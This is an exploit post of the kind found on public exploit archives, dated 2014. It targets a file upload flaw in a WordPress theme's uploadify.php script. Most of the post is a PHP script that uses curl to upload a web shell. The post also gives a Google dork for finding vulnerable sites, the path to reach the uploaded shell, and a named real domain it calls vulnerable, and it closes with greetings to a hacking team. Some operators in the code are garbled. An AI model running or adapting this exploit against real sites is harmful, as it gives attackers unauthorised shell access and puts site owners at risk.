facebook facebook twitter rss

Wordpress Themes wp-avatar File Upload Vulnerability

Author: PooiChai , Published: 29-08-2014
Exploit Title: Wordpress Themes  wp-avatar File Upload Vulnerability

Google Dork: inurl:theme/default

Date: 29/08/2014

Facebook:fb.me/iloveyou7789

Author: PooiChai



##########################################################################################################


[+] exploit

<?php

$uploadfile
="nameshell.php";

$ch curl_init("http://localhost/theme/default/js/uploadify/uploadify.php");

curl_setopt($chCURLOPT_POSTtrue);

curl_setopt($chCURLOPT_POSTFIELDS,


              array(
'Filedata'=>"@$uploadfile",

              
'folder'=>'/theme/default/js/uploadify/'));



curl_setopt($chCURLOPT_RETURNTRANSFER1);

$postResult curl_exec($ch);

curl_close($ch);



  print 
"$postResult";

?>









Shell Access : http://localhost/theme/default/js/uploadify/nameshell.php

vuln :linkageslist.org/theme/default/js/uploadify/uploadify.php

##############################################################################################







Gr33tz to : ./Trojanspot ./Sacker_Boy ./chliZAceh ./Rijal North Aceh ./Sijulai ./Reja-exe ./TNCA ./Anon Boy ./Mirzja ./Derry prilian ./pengemis 1337 ./Adi



And big family ACEH CYBER TEAM

Like us on Facebook :